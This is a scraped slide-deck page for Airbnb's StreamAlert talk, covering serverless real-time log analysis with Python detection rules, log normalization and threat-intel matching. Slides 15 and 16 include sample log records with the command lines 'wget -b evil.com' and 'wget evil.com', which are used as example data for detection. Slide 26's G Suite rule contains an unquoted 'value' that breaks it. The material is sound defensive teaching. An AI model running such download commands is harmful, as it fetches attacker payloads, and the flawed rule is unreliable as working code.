Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...
 
SRV408 Deep Dive on AWS IoT
SRV408 Deep Dive on AWS IoTSRV408 Deep Dive on AWS IoT
SRV408 Deep Dive on AWS IoT
 
AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...
AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...
AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...
 
SRV408 Deep Dive on AWS IoT
SRV408 Deep Dive on AWS IoTSRV408 Deep Dive on AWS IoT
SRV408 Deep Dive on AWS IoT
 
AWS IoT Deep Dive
AWS IoT Deep DiveAWS IoT Deep Dive
AWS IoT Deep Dive
 
Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...
Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...
Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application security
 
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
 
ZMON: Monitoring Zalando's Engineering Platform
ZMON: Monitoring Zalando's Engineering PlatformZMON: Monitoring Zalando's Engineering Platform
ZMON: Monitoring Zalando's Engineering Platform
 
Deep Dive on AWS IoT
Deep Dive on AWS IoTDeep Dive on AWS IoT
Deep Dive on AWS IoT
 
PyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonPyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with Python
 
Un-broken Logging - TechnologyUG - Leeds - Matthew Skelton
Un-broken Logging - TechnologyUG - Leeds - Matthew SkeltonUn-broken Logging - TechnologyUG - Leeds - Matthew Skelton
Un-broken Logging - TechnologyUG - Leeds - Matthew Skelton
 
AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...
AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...
AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...
 
2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backend
2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backend2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backend
2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backend
 
Security Certification: Security Analytics using Sumo Logic - Oct 2018
Security Certification: Security Analytics using Sumo Logic - Oct 2018Security Certification: Security Analytics using Sumo Logic - Oct 2018
Security Certification: Security Analytics using Sumo Logic - Oct 2018
 
Webinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDBWebinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDB
 
SRV408 Deep Dive on AWS IoT
SRV408 Deep Dive on AWS IoTSRV408 Deep Dive on AWS IoT
SRV408 Deep Dive on AWS IoT
 
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK BehaviorsStarted from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
 
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDutyAWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
 

Mehr von Amazon Web Services

Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Amazon Web Services
 
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Amazon Web Services
 
Esegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateEsegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateAmazon Web Services
 
Costruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSCostruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSAmazon Web Services
 
Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Amazon Web Services
 
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Amazon Web Services
 
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...Amazon Web Services
 
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsMicrosoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsAmazon Web Services
 
Database Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareDatabase Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareAmazon Web Services
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSAmazon Web Services
 
API moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAPI moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAmazon Web Services
 
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareDatabase Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareAmazon Web Services
 
Tools for building your MVP on AWS
Tools for building your MVP on AWSTools for building your MVP on AWS
Tools for building your MVP on AWSAmazon Web Services
 
How to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckHow to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckAmazon Web Services
 
Building a web application without servers
Building a web application without serversBuilding a web application without servers
Building a web application without serversAmazon Web Services
 
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...Amazon Web Services
 
Introduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceIntroduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceAmazon Web Services
 

Mehr von Amazon Web Services (20)

Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
 
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
 
Esegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateEsegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS Fargate
 
Costruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSCostruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWS
 
Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot
 
Open banking as a service
Open banking as a serviceOpen banking as a service
Open banking as a service
 
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
 
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
 
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsMicrosoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
 
Computer Vision con AWS
Computer Vision con AWSComputer Vision con AWS
Computer Vision con AWS
 
Database Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareDatabase Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatare
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
 
API moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAPI moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e web
 
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareDatabase Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
 
Tools for building your MVP on AWS
Tools for building your MVP on AWSTools for building your MVP on AWS
Tools for building your MVP on AWS
 
How to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckHow to Build a Winning Pitch Deck
How to Build a Winning Pitch Deck
 
Building a web application without servers
Building a web application without serversBuilding a web application without servers
Building a web application without servers
 
Fundraising Essentials
Fundraising EssentialsFundraising Essentials
Fundraising Essentials
 
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
 
Introduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceIntroduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container Service
 

Airbnb - StreamAlert

  • 1. StreamAlert Serverless, Real-time, Data Analysis CHUNYONG LIN / RYAN DEIVERT / 7 JUNE 2018
  • 2. 1. Who Are We 2. What is StreamAlert 3. Data Normalization 4. Threat Intel 5. StreamAlert Apps 6. The Future
  • 3. 1. Who Are We Ryan Deivert CSIRT Engineer Chunyong Lin CSIRT Engineer Austin Byers CSIRT Engineer Awesome You CSIRT Engineer Jack Naglieri CSIRT Engineering Manager CSIRT Engineering
  • 4. 1. Who Are We 2. StreamAlert Incoming Data Kinesis SNS S3 StreamAlert Apps Outgoing Alerts Lambda Slack PagerDuty S3 StreamAlert Serverless real-time data analysis streamalert.io github.com/airbnb/streamalert
  • 5. Why StreamAlert? ● Serverless ● Real-time alerting ● Scalable ● Infrastructure as code ● Simple deployment ● Extensive data format support ○ CSV, JSON, key-value, syslog ● Support for different use-cases ○ Security monitoring, compliance, ops 1. Who Are We 2. StreamAlert
  • 6. { "account": "123456", "detail": { "awsRegion": "us-west-2", "eventID": "11111", "eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com", "eventTime": "2018-06-07T00:00:00Z", "eventType": "AwsConsoleSignIn" }, "detail-type": "type", "id": "11111", "region": "us-west-2", "resources": [], "source": "source_stream_name", "time": "2018-06-07T00:00:00Z", "version": "1.0" } Incoming Log & Schema { "cloudwatch:events": { "schema": { "account": "string", "detail": {}, "detail-type": "string", "id": "string", "region": "string", "resources": [], "source": "string", "time": "string", "version": "string" }, "parser": "json" } } { "account": "123456", "detail": { "awsRegion": "us-west-2", "eventID": "11111", "eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com", "eventTime": "2018-06-07T00:00:00Z", "eventType": "AwsConsoleSignIn" }, "detail-type": "type", "id": "11111", "region": "us-west-2", "resources": [], "source": "source_stream_name", "time": "2018-06-07T00:00:00Z", "version": "1.0" } 1. Who Are We 2. StreamAlert
  • 7. from stream_alert.shared.rule import rule @rule(logs=['ghe:general'], outputs=['slack:alerts']) def github_disable_two_factor_requirement_user(rec): """ Alert if two-factor authentication requirement was disabled for a user. """ return rec['action'] == 'two_factor_authentication.disabled' Simple Python Rule 1. Who Are We 2. StreamAlert
  • 8. { "account": "123456", "detail": { "awsRegion": "us-west-2", "eventID": "11111", "eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com", "eventTime": "2018-06-07T00:00:00Z", "eventType": "AwsConsoleSignIn" }, "detail-type": "type", "id": "11111", "region": "us-west-2", "resources": [], "source": "source_stream_name", "time": "2018-06-07T00:00:00Z", "version": "1.0" } Incoming Log 1. Who Are We 2. StreamAlert
  • 9. from stream_alert.shared.rule import rule @rule(logs=['cloudwatch:events'], req_subkeys={'detail': ['userIdentity', 'eventType']}) def cloudtrail_root_account_usage(rec): """Alert when root AWS credentials are used.""" return (rec['detail']['userIdentity']['type'] == 'Root' and rec['detail']['userIdentity'].get('invokedBy') is None and rec['detail']['eventType'] != 'AwsServiceEvent') More Complex Python Rule 1. Who Are We 2. StreamAlert
  • 10. ● CloudWatch Logs & Events Rules ● S3 Buckets & Event Notifications ● Kinesis Streams and Firehose ● Simple Notification Service AWS Services for Incoming Data 1. Who Are We 2. StreamAlert
  • 11. ● Lambda ● DynamoDB ● System Manager Parameter Store AWS Services for Rule Processing 1. Who Are We 2. StreamAlert
  • 12. ● S3 Bucket ● Athena ● Simple Queue Service ● Lambda Function AWS Services for Output 1. Who Are We 2. StreamAlert
  • 13. Real-Time Data Analysis Classify, Normalize, Enrich, and Process Rules Alert Dispatching Alerts Alert Merging Data Enrichment and Rule State IOCs Rule Metadata Outgoing Alerts Lambda Slack PagerDuty S3 Historical Search Partitioning Kinesis Firehose S3 Athena S3 Events Laptops, Workstations, Servers SaaS Applications APIs Other Incoming Data Kinesis SNS S3 StreamAlert Apps
  • 14. 1. Who Are We 2. StreamAlert Alert Searching via Athena
  • 15. { "destinationAddress": "1.2.3.4", "hostIdentifier": "cylin_mbp", "cmdline": "wget -b evil.com", "pid": "1234" } { "destinationAddress": "1.2.3.4", "hostIdentifier": "cylin_mbp", "cmdline": "wget -b evil.com", "pid": "1234" } 1. Who Are We 2. StreamAlert 3. Normalization { "server": "cylin_server", "command_line": "wget evil.com", "computer_name": "cylin_mbp", "md5": "ABCDEF123456", "remote_ip": "1.2.3.4" } Log 1 from log_source_1: Log 2 from log_source_2: { "server": "cylin_server", "command_line": "wget evil.com", "computer_name": "cylin_mbp", "md5": "ABCDEF123456", "remote_ip": "1.2.3.4" } The Problem
  • 16. from stream_alert.shared.rule import rule BAD_IP = '1.2.3.4' @rule(logs=['log_source_1']) def bad_ip_address_log_source_1(rec): """Alert on the record from bad ip address from log_source_1""" return rec['remote_ip'] == BAD_IP { "server": "cylin_server", "command_line": "wget evil.com", "computer_name": "cylin_mbp", "md5": "ABCDEF123456", "remote_ip": "1.2.3.4" } Log 1 from log_source_1: from stream_alert.shared.rule import rule BAD_IP = '1.2.3.4' @rule(logs=['log_source_2']) def bad_ip_address_log_source_2(rec): """Alert on the record from bad ip address from log_source_2""" return rec['destinationAddress'] == BAD_IP { "destinationAddress": "1.2.3.4", "hostIdentifier": "cylin_mbp", "cmdline": "wget -b evil.com", "pid": "1234" } Log 2 from log_source_2:
  • 18. from stream_alert.shared.rule import rule from helpers.base import fetch_values_by_datatype BAD_IP = '1.2.3.4' @rule(datatypes=['ipAddress']) def bad_ip_address(rec): """Alert on the record from bad ip address.""" ip_addresses = fetch_values_by_datatype(rec, 'ipAddress') return BAD_IP in ip_addresses Example Rule, Normalization 1. Who Are We 2. StreamAlert 3. Normalization
  • 19. Potential Considerations ● Too many bad ip addresses ● Lambda memory limitation ● How to update with new IOCs ● How to resolve False Positives 1. Who Are We 2. StreamAlert 3. Normalization
  • 20. Classify & Normalize IOCs ● File hashes ● Domains ● IP addresses 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel
  • 21. from stream_alert.shared.rule import rule, disable from stream_alert.rule_processor.threat_intel import StreamThreatIntel @rule(datatypes=['ipAddress']) def threat_intel_ioc_match_ip_address(rec): """Alert on the record from bad ip address.""" if (StreamThreatIntel.IOC_KEY in rec and rec[StreamThreatIntel.IOC_KEY].get('ip')): return True return False Example Rule, Threat Intelligence 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel
  • 22. StreamAlert Rule Processor StreamAlert Apps SSM Parameter Store App Lambda CloudWatch Scheduled Event More SaaS applications 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps
  • 23. 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps Apps in Action
  • 24. from stream_alert.shared.rule import rule @rule(logs=['duo:authentication']) def duo_fraud(rec): """Alert on any Duo authentication marked as fraud.""" return rec['result'] == 'FRAUD' Duo Push notification marked as fraudulent by the end user 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps from stream_alert.shared.rule import rule @rule(logs=['duo:authentication']) def duo_fraud(rec): """Alert on any Duo authentication marked as fraud.""" return rec['result'] == 'FRAUD'
  • 25. from helpers.base import ends_with_any from stream_alert.shared.rule import rule _VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'} @rule(logs=['box:admin_events']) def box_events_non_domain_email(rec): """Alert on box logins with untrusted email addresses""" if rec['event_type'] != 'LOGIN': return False email = rec['created_by'].get('login') return not ends_with_any(email, _VALID_EMAIL_SUFFIXES) Box Box login with email outside of the trusted domain 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps from helpers.base import ends_with_any from stream_alert.shared.rule import rule _VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'} @rule(logs=['box:admin_events']) def box_events_non_domain_email(rec): """Alert on box logins with untrusted email addresses""" if rec['event_type'] != 'LOGIN': return False email = rec['created_by'].get('login') return not ends_with_any(email, _VALID_EMAIL_SUFFIXES) from helpers.base import ends_with_any from stream_alert.shared.rule import rule _VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'} @rule(logs=['box:admin_events']) def box_events_non_domain_email(rec): """Alert on box logins with untrusted email addresses""" if rec['event_type'] != 'LOGIN': return False email = rec['created_by'].get('login') return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
  • 26. from stream_alert.shared.rule import rule @rule(logs=['gsuite:reports']) def gsuite_suspicious_logons(rec): """Alert on suspicious G Suite logins""" if rec['id']['applicationName'] != 'login': return False for event in rec['events']: if event.get('name') == 'login_challenge': for param in event.get('parameters', []): if (param.get('name') == 'login_challenge_status' and param.get(value) == 'Challenge Failed.'): return True return False G Suite G Suite user failed challenge during login 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps from stream_alert.shared.rule import rule @rule(logs=['gsuite:reports']) def gsuite_suspicious_logons(rec): """Alert on suspicious G Suite logins""" if rec['id']['applicationName'] != 'login': return False for event in rec['events']: if event.get('name') == 'login_challenge': for param in event.get('parameters', []): if (param.get('name') == 'login_challenge_status' and param.get(value) == 'Challenge Failed.'): return True return False
  • 27. Alert in PagerDuty 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps
  • 28. 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps 6. The Future In Progress ● Alert merging ● Rule “baking”
  • 30. QUESTIONS? @jacknagz @ryandeivert @austinbyers @chunyong-lin All third party names and trademarks are the property of their respective owners